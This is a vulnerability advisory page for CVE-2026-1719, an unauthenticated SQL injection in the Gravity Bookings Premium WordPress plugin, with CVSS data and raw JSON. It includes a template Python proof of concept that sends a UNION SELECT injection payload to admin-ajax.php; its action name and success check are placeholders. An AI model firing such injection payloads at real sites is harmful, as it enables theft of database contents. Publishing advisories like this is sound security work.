Security Vulnerability Report
中文
CVE-2026-1719 CVSS 7.5 HIGH

CVE-2026-1719

Published: 2026-05-06 10:16:19
Last Modified: 2026-05-06 13:06:42

Description

The Gravity Bookings Premium plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.5.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Gravity Bookings Premium <= 2.5.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-1719 PoC # Target: WordPress Gravity Bookings Premium <= 2.5.9 # Description: Unauthenticated SQL Injection via user-supplied parameter target_url = "http://example.com/wp-admin/admin-ajax.php" payload = "1' UNION SELECT 1,2,3,4,5-- -" # The vulnerable parameter might be part of a booking query or status check # Adjust the parameter name based on specific plugin source code analysis data = { "action": "vulnerable_action_name", "id": payload } try: response = requests.post(target_url, data=data) if "sensitive_data_indicator" in response.text: print("[+] Vulnerability confirmed! SQL Injection successful.") else: print("[-] Exploit failed or target patched.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1719", "sourceIdentifier": "[email protected]", "published": "2026-05-06T10:16:18.903", "lastModified": "2026-05-06T13:06:42.220", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gravity Bookings Premium plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.5.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://gravitybooking.com/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ce032abe-ee9d-4be1-ac97-5fa95d598e85?source=cve", "source": "[email protected]"}]}}